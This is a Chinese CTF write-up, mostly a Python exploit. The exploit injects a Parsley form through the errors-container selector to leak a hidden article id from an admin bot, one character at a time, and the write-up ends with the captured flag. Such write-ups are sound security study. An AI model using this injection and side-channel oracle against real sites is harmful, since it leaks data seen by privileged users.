ArticleShare

  1. 在前端代码中得知提示: side channel attack（侧信道攻击）。后面的 payload 利用的是页面上表单校验库（Parsley）的 `data-parsley-errors-container` 属性可以写任意 CSS 选择器这一点。

  2. exp如下

import requests
import time
import sys

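def main(host, port, *, alphabet="abcdef0123456789", flag_len=16, delay=10):
    """Recover a hidden article id one character at a time via a CSS side channel.

    For every candidate character the script submits an article whose body is
    a Parsley form.  Its ``data-parsley-errors-container`` is a CSS selector on
    ``a[href^='/lookup.php?id=<prefix><guess>']``, and the error message it
    injects is a fake ``<input type=button id=like>``.  After asking the admin
    bot (``admin.php``) to visit the article, the script checks ``lookup.php``:
    when the guess is right, the real like button is (presumably) shadowed by
    the injected one and the page never shows ``Liked by admin`` -- the absence
    of the like is the oracle.

    Args:
        host: target hostname or IP.
        port: target port (anything that formats into a URL).
        alphabet: characters tried at each position; the original used lowercase hex.
        flag_len: number of characters to recover.
        delay: seconds to wait for the admin bot before reading the oracle.

    Returns:
        The recovered prefix.  It is shorter than ``flag_len`` when a position
        could not be confirmed (see the printed message); in that case re-run
        with the confirmed prefix rather than trusting the later characters.

    Raises:
        RuntimeError: the CSRF field is missing from the index page, or
            ``add.php`` does not redirect to an article id.
    """
    s = requests.Session()
    base_url = f"http://{host}:{port}/"
    res = s.get(base_url)

    # CSRF token of the hidden field "c".  The original sliced a fixed 16
    # characters; reading up to the closing quote keeps working if the token
    # length changes, and a missing field is reported instead of silently
    # producing garbage (str.find returns -1).
    marker = 'name="c" value="'
    pos = res.text.find(marker)
    if pos < 0:
        raise RuntimeError("CSRF token field not found on the index page")
    pos += len(marker)
    end = res.text.find('"', pos)
    csrftoken = res.text[pos:end] if end >= 0 else res.text[pos:pos + 16]

    flag = ""
    for i in range(flag_len):
        for j in alphabet:
            print("trying", j)
            payload = f'''<form data-parsley-validate>
                      <input data-parsley-required
                      data-parsley-trigger=\"blur\"
                      data-parsley-error-message=\"<input type=button id=like>\"
                      data-parsley-errors-container=\"a[href^=\'/lookup.php?id={flag + j}\']\"
                      autofocus>
                      </form>'''
            data = {'c': csrftoken, 'content': payload}
            res = s.post(base_url + "add.php", data=data, allow_redirects=False)

            # add.php answers with a redirect to the new article; the id is
            # whatever follows "id=" in the Location header.
            location = res.headers.get('Location')
            if not location or 'id=' not in location:
                raise RuntimeError(
                    f"add.php did not redirect to an article id (status {res.status_code})"
                )
            wp = location[location.find('id=') + 3:]

            # Ask the admin bot to visit the article, then give it time to act.
            s.post(base_url + "admin.php", data={'c': csrftoken, 'id': wp})
            time.sleep(delay)

            res = s.get(f"{base_url}lookup.php?id={wp}")
            txt = res.text.replace("\n", "").replace("\r", "")
            # No admin like => the selector matched => the guess is correct.
            if "Liked by</h3>admin" not in txt:
                flag += j
                print(i, flag)
                break
        else:
            # No candidate suppressed the like.  Most likely the bot did not
            # visit in time or the oracle misfired; stop here rather than
            # silently shifting every later character by one position.
            print(f"position {i}: no character confirmed, recovered so far: {flag!r}")
            break
    return flag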

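if __name__ == '__main__':
    # The published write-up redacted the target as "********" / "*****";
    # take HOST and PORT from the command line instead of shipping
    # placeholders that can never resolve.
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} HOST PORT")
    main(sys.argv[1], sys.argv[2])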
  1. 如果某一位没有爆出来（内层循环把所有候选字符试完都没有命中，通常是 admin bot 没有在 10 秒内访问），就把已经爆出来的前缀去掉最后一位，作为 flag 的初始值重新运行脚本，从那一位继续往后爆即可。

  2. flag如下

ctf{s1d3_ch4nn3l_attack_is_funny_bluecup2023_got_it}